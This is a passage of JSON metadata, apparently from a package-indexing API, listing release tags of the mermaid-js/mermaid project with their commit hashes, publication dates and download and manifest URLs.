3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@%40mermaid-js%2Flayout-elk%400.1.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/@mermaid-js%2Flayout-elk@0.1.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/@mermaid-js%2Flayout-elk@0.1.3/manifests"},{"name":"@mermaid-js/parser@0.3.0","sha":"32710c1d995db394ff8cd65c280dbb0a3026630f","kind":"tag","published_at":"2024-09-02T15:18:41.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/@mermaid-js/parser@0.3.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/@mermaid-js/parser@0.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@%40mermaid-js%2Fparser%400.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/@mermaid-js%2Fparser@0.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/@mermaid-js%2Fparser@0.3.0/manifests"},{"name":"@mermaid-js/layout-elk@0.1.2","sha":"95274278f39a31f00188935f3d7d1f0c3ccc607a","kind":"tag","published_at":"2024-08-24T07:21:12.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/@mermaid-js/layout-elk@0.1.2","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/@mermaid-js/layout-elk@0.1.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@%40mermaid-js%2Flayout-elk%400.1.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/@mermaid-js%2Flayout-elk@0.1.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/@mermaid-js%2Flayout-elk@0.1.2/manifests"},{"name":"mermaid@11.0.2","sha":"158f9925cedd6e1a205635bd1b45e6dd58cac5f6","kind":"tag","published_at":"2024-08-24T07:06:16.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/mermaid@11.0.2","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/mermaid@11.0.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@mermaid%4011.0.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/mermaid@11.0.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/mermaid@11.0.2/manifests"},{"name":"@mermaid-js/layout-elk@0.1.1","sha":"158f9925cedd6e1a205635bd1b45e6dd58cac5f6","kind":"tag","published_at":"2024-08-24T07:06:16.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/@mermaid-js/layout-elk@0.1.1","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/@mermaid-js/layout-elk@0.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@%40mermaid-js%2Flayout-elk%400.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/@mermaid-js%2Flayout-elk@0.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/@mermaid-js%2Flayout-elk@0.1.1/manifests"},{"name":"@mermaid-js/parser@0.2.0","sha":"158f9925cedd6e1a205635bd1b45e6dd58cac5f6","kind":"tag","published_at":"2024-08-24T07:06:16.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/@mermaid-js/parser@0.2.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/@mermaid-js/parser@0.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@%40mermaid-js%2Fparser%400.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/@mermaid-js%2Fparser@0.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/@mermaid-js%2Fparser@0.2.0/manifests"},{"name":"mermaid@11.0.1","sha":"4d10e3f2586fb8b08b72d93a1036a17d53153997","kind":"tag","published_at":"2024-08-23T15:04:26.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/mermaid@11.0.1","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/mermaid@11.0.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@mermaid%4011.0.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/mermaid@11.0.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/mermaid@11.0.1/manifests"},{"name":"v11.0.0","sha":"2cfdd1620a8ceef37c0b738569dfb8bcc0005547","kind":"commit","published_at":"2024-08-23T12:07:47.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/v11.0.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/v11.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@v11.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v11.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v11.0.0/manifests"},{"name":"v10.9.1","sha":"dab26df9c4ca69cc4a8c46a22286a2f63ea9ed3e","kind":"commit","published_at":"2024-05-14T10:55:39.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/v10.9.1","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/v10.9.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@v10.9.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.9.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.9.1/manifests"},{"name":"v10.9.0","sha":"da33867ad798872d9f8406532263ff5e569f1185","kind":"commit","published_at":"2024-03-05T17:22:07.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/v10.9.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/v10.9.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@v10.9.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.9.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.9.0/manifests"},{"name":"v10.8.0","sha":"51e7444b94ab0b872eaabc3b138184b47442fab4","kind":"commit","published_at":"2024-02-02T10:10:42.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/v10.8.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/v10.8.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@v10.8.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.8.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.8.0/manifests"},{"name":"v10.7.0","sha":"dc857f804e955484b2f92cefc0aaa7b4afb159c4","kind":"commit","published_at":"2024-01-15T09:17:03.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/v10.7.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/v10.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@v10.7.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.7.0/manifests"},{"name":"v10.6.1","sha":"65daab2aaf8fc3e54f34b2d468d19486034e06c7","kind":"commit","published_at":"2023-11-06T13:57:01.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/v10.6.1","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/v10.6.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@v10.6.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.6.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.6.1/manifests"},{"name":"v10.6.0","sha":"29942c04dc92a64f8c618d6d55f9b57800341cf5","kind":"commit","published_at":"2023-10-25T09:07:12.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/v10.6.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/v10.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@v10.6.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.6.0/manifests"},{"name":"v10.5.1","sha":"b70959daa7666d25416ab3c4b89ffbc328927d20","kind":"commit","published_at":"2023-10-20T12:30:52.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/v10.5.1","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/v10.5.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@v10.5.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.5.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.5.1/manifests"},{"name":"v10.5.0","sha":"bb0d549d0dc489767b240a910a6831b4a7771fd2","kind":"commit","published_at":"2023-10-02T08:00:13.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/v10.5.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/v10.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@v10.5.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.5.0/manifests"},{"name":"v10.4.0","sha":"8e5275d8441def82597db534f5a15b27cc6376a7","kind":"commit","published_at":"2023-08-25T12:19:00.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/v10.4.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/v10.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@v10.4.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.4.0/manifests"},{"name":"v10.3.1","sha":"a0b80f5490f812ccbc74d6246f2ecc39b03db147","kind":"commit","published_at":"2023-08-11T12:03:56.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/v10.3.1","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/v10.3.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@v10.3.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.3.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.3.1/manifests"},{"name":"v10.3.0","sha":"165e0b6c6862e183c9bdb75fbc5839555bbc99d0","kind":"commit","published_at":"2023-07-26T07:49:15.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/v10.3.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/v10.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@v10.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.3.0/manifests"},{"name":"v10.2.4","sha":"453b337e6e0e6f02357293764c27c29c236fe848","kind":"commit","published_at":"2023-06-30T11:10:22.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/v10.2.4","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/v10.2.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@v10.2.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.2.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.2.4/manifests"},{"name":"v10.2.3","sha":"75f9de3d4ae79b8939607872fa9467d5413855ff","kind":"commit","published_at":"2023-06-08T14:24:25.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/v10.2.3","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/v10.2.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@v10.2.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.2.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.2.3/manifests"},{"name":"v10.2.2","sha":"d2409dc1638f1e8c3d006a3350b598d69d2f7a50","kind":"commit","published_at":"2023-06-02T06:50:59.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/v10.2.2","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/v10.2.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@v10.2.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.2.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.2.2/manifests"},{"name":"v10.2.1","sha":"48e5d743b3bb0264390644b0d054850d821097e5","kind":"commit","published_at":"2023-06-01T11:03:14.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/v10.2.1","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/v10.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@v10.2.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.2.1/manifests"},{"name":"v10.2.0","sha":"8d43b87200ba0b59f6800942e03154dccc6b57b7","kind":"commit","published_at":"2023-05-24T17:03:22.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/v10.2.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/v10.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@v10.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.2.0/manifests"},{"name":"v10.1.0","sha":"e7c237dcf3062cd6163e129aedc620ef08d6f89a","kind":"commit","published_at":"2023-04-04T13:19:15.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/v10.1.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/v10.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@v10.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.1.0/manifests"},{"name":"v9.4.3","sha":"1a7b8d38970f367e273b61599e6c4f75a8635158","kind":"commit","published_at":"2023-03-07T18:00:44.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/v9.4.3","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/v9.4.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@v9.4.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v9.4.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v9.4.3/manifests"},{"name":"v9.4.2","sha":"c965e4c4564441975b71f0996e3a7ec2167ae21d","kind":"commit","published_at":"2023-03-07T15:50:32.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/v9.4.2","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/v9.4.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@v9.4.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v9.4.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v9.4.2/manifests"},{"name":"v10.0.2","sha":"20298d243ad1bf0447800a3ec24851d6bac8b6fa","kind":"commit","published_at":"2023-03-02T12:45:56.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/v10.0.2","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/v10.0.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@v10.0.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.0.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.0.2/manifests"},{"name":"v10.0.1","sha":"4a9d96aaba6c5a1ebb295d085b421d9102d83e96","kind":"commit","published_at":"2023-03-01T13:04:03.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/v10.0.1","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/v10.0.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@v10.0.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.0.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.0.1/manifests"},{"name":"v10.0.0","sha":"555d4f2cdc83ebeaf0b41f57a05722ffb6d921af","kind":"commit","published_at":"2023-02-21T07:57:37.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/v10.0.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/v10.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@v10.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.0.0/manifests"},{"name":"v9.4.0","sha":"97614b8af56a122022a71267996c0646b4a1e312","kind":"commit","published_at":"2023-02-15T14:54:02.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/v9.4.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/v9.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@v9.4.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v9.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v9.4.0/manifests"},{"name":"v9.3.0","sha":"5735efacbe58634dcff91317170be2e010b7283e","kind":"commit","published_at":"2022-12-15T09:16:12.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/v9.3.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/v9.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@v9.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v9.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v9.3.0/manifests"},{"name":"v9.2.2","sha":"9bb0ed2040cce9be83c63e097e26e4b361a8bdd6","kind":"commit","published_at":"2022-11-09T14:54:39.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/v9.2.2","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/v9.2.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@v9.2.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v9.2.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v9.2.2/manifests"},{"name":"v9.2.1","sha":"ba7f83019f06d092a4549b98ebc97679fda196a8","kind":"commit","published_at":"2022-11-08T14:25:05.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/v9.2.1","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/v9.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@v9.2.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v9.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v9.2.1/manifests"},{"name":"v9.2.0","sha":"e78ac9b92a75223df728b4a1866a8d7d460a4691","kind":"commit","published_at":"2022-11-01T14:27:20.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/v9.2.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/v9.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@v9.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v9.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v9.2.0/manifests"},{"name":"v9.1.7","sha":"0c0468123fa1ca08baf69716eeca0b8872075b5e","kind":"commit","published_at":"2022-09-13T17:55:34.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/v9.1.7","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/v9.1.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@v9.1.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v9.1.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v9.1.7/manifests"},{"name":"9.1.6","sha":"a89b6fd0549a91fb09e72c4e40decf5a0b866828","kind":"commit","published_at":"2022-08-18T17:57:58.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/9.1.6","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/9.1.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@9.1.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/9.1.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/9.1.6/manifests"},{"name":"9.1.5","sha":"af8a5cbbfac33c54d4b1615611fdcc7575180ef1","kind":"commit","published_at":"2022-08-11T18:29:15.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/9.1.5","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/9.1.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@9.1.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/9.1.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/9.1.5/manifests"},{"name":"9.1.4","sha":"4dcf7feec02ed40e86ff23f78430e1074b6d5ab6","kind":"commit","published_at":"2022-08-04T18:25:37.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/9.1.4","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/9.1.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@9.1.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/9.1.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/9.1.4/manifests"},{"name":"9.1.3","sha":"1509ee68bede6c6dc12bcc196d54b89f3b97ac4a","kind":"tag","published_at":"2022-06-28T18:03:42.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/9.1.3","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/9.1.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@9.1.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/9.1.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/9.1.3/manifests"},{"name":"9.1.2","sha":"3b8d74f1f9be198617491809535158bdc83c2ed2","kind":"tag","published_at":"2022-06-14T17:31:19.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/9.1.2","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/9.1.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@9.1.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/9.1.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/9.1.2/manifests"},{"name":"9.1.1","sha":"5a9ec30803398464688f7e460fc66a008814d7a2","kind":"tag","published_at":"2022-05-11T12:29:16.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/9.1.1","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/9.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@9.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/9.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/9.1.1/manifests"},{"name":"9.1.0","sha":"8889b05d29442062c9162458fa595d5abd3903d4","kind":"tag","published_at":"2022-05-10T16:46:08.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/9.1.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/9.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@9.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/9.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/9.1.0/manifests"},{"name":"9.0.1","sha":"179584b4bbfd3738d51021272819e48648b30614","kind":"tag","published_at":"2022-04-21T20:06:16.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/9.0.1","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/9.0.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@9.0.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/9.0.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/9.0.1/manifests"},{"name":"9.0.0","sha":"f72d3c43723c30ba1eec825d97e46fae84e5b502","kind":"tag","published_at":"2022-04-07T18:47:11.000Z","download_url":"https://codelo